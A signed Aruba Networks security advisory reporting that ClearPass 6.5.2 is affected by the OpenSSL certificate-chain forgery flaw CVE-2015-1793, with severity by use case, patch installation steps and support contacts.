-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Aruba Product Security Advisory
===============================

Advisory ID: ARUBA-PSA-2015-008
CVE: CVE-2015-1793
Publication Date: 2015-Jul-09
Status: Confirmed, Final
Revision: 2



Title
=====
OpenSSL Alternative chains certificate forgery
 

Overview
========
A high-severity vulnerability exists in OpenSSL.  For more details, see the original OpenSSL advisory 
at http://openssl.org/news/secadv_20150709.txt.


Affected
========

 -- ClearPass 6.5.2


Unaffected Aruba Products
=========================

 -- Other versions of ClearPass
 -- ArubaOS (includes controllers and Mobility Access Switch)
 -- AirWave
 -- Aruba Instant
 -- Aruba Central
 -- VIA
 -- Meridian


Details
=======

On July 9, 2015, the OpenSSL Project reported a high-severity vulnerability in certain
versions of OpenSSL.  The vulnerability affects processing of certificate trust chains.
ClearPass version 6.5.2 was released on June 26, 2015 and contains OpenSSL version 1.0.1o,
which is affected by the vulnerability.

The severity of this vulnerability depends on how ClearPass is being used:

  Use case					Severity
  --------------------------------------------- ---------------
  Authentication with EAP-TLS			CRITICAL
  Mgmt authentication using certificates	CRITICAL
  Non-certificate-based authentication		Low

If certificate-based authentication is in use, an attacker could potentially exploit this
vulnerability to gain unauthorized access to network resources.


Resolution
==========

A patch for ClearPass 6.5.2 has been made available to address this issue.

Please use any of the methods listed below to install the patch.
 
Installing the Patch Online Using the Software Updates Portal:
1. Open ClearPass Policy Manager and go to Administration > Agents and Software Updates > Software Updates.
2. In the Firmware and Patch Updates area, find the 'OpenSSL fix for CVE-2015-1793' patch and click the Download button in its row.
3. Click Install. 
4. When the installation is complete and the status is shown as Needs Restart, proceed to restart ClearPass. After reboot, the status for the patch will be shown as Installed. The ClearPass Policy Manager version number will not change. 
 
Installing the Patch Offline Using the Patch File from support.arubanetworks.com and HTTP:
1. Download the 'OpenSSL fix for CVE-2015-1793 for ClearPass 6.5.2’ patch from the Support site.
2. Post the patch file to a local HTTP server.
3. Open an SSH session to the ClearPass appliance using the ‘appadmin’ account.
4. Type 'system update –i <http location of the file>’
5. When the installation is complete, issue ’system restart'. After reboot, the status for the patch will be shown as Installed. The ClearPass Policy Manager version number will not change. 

Installing the Patch Offline Using the Patch File from support.arubanetworks.com and SCP:
1. Download the 'OpenSSL fix for CVE-2015-1793 for ClearPass 6.5.2’ patch from the Support site.
2. Post the patch file to a local SCP server.
3. Open an SSH session to the ClearPass appliance using the ‘appadmin’ account.
4. Type 'system update –i < user@<scp location of the file>'
5. When the installation is complete, issue ’system restart'. After reboot, the status for the patch will be shown as Installed. The ClearPass Policy Manager version number will not change. 

Installing the Patch Offline Using the Patch File from support.arubanetworks.com:
1. Download the 'OpenSSL fix for CVE-2015-1793 for ClearPass 6.5.2’ patch from the Support site.
2. Open the ClearPass Policy Manager Admin UI and go to Administration > Agents and Software Updates > Software Updates.
3. At the bottom of the Firmware and Patch Updates area, click Import Updates and browse to the downloaded patch file.
4. Click Install.
5. When the installation is complete and the status is shown as Needs Restart, proceed to restart ClearPass. After reboot, the status for the patch will be shown as Installed. The ClearPass Policy Manager version number will not change.


Obtaining Fixed Software
========================

Aruba customers can obtain software updates on the support website:
	http://support.arubanetworks.com


Aruba Support contacts are as follows:

	+1-800-WiFiLAN (1-800-943-4526) (toll free from within North America)
	
	+1-408-754-1200 (toll call from anywhere in the world)

	The full contact list is at:
	http://www.arubanetworks.com/support-services/support-program/contact-support/

	e-mail: support(at)arubanetworks.com

Please do not contact "sirt(at)arubanetworks.com" for software upgrades.


Revision History
================

      Revision 1.0 / 2015-Jul-09 / Initial release
      Revision 2.0 / 2015-Jul-14 / Updated to add resolution instructions.

Aruba SIRT Security Procedures
==============================

Complete information on reporting security vulnerabilities in Aruba Networks
products, obtaining assistance with security incidents is available at:

http://www.arubanetworks.com/support-services/security-bulletins/
   
  
For reporting *NEW* Aruba Networks security issues, email can be sent to
sirt(at)arubanetworks.com. For sensitive information we encourage the use of 
PGP encryption. Our public keys can be found at:

http://www.arubanetworks.com/support-services/security-bulletins/


(c) Copyright 2015 by Aruba Networks, Inc.
This advisory may be redistributed freely after the release date given at
the top of the text, provided that redistributed copies are complete and
unmodified, including all date and version information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBCAAGBQJVpXsvAAoJEJj+CcpFhYbZTHsH/1NMC9ppX3iHMkHMKMy3iqwy
h4c22siYN0TvWPY9FniylBuFgKFfy2S0EuWoYelRoPizm0bR4owMr6UtaLfwfiem
arwRSbm+A4Gb4bX9yFRBtRNdrrSO8J/mvq9gsRYQz0JeRFmI11DsJBEsSpMkoOgV
71VtP8FFLaazsR6rvXoL/zS1jv4fWz++t22cT6bElWrWI2MZU97N5DV2o20bLyaF
lOHU8ESNVR0NS+qutItyY6ao+plwF/nRacXnKzcSc3L8xOl8ulJL2GNpHBEKIReU
TSQ2ChO1t30BeRz0X5qnMzwsyr9cJC7lnWk9YZxX7JZNFOj4tDaJ7SSpN0DWpDk=
=dma1
-----END PGP SIGNATURE-----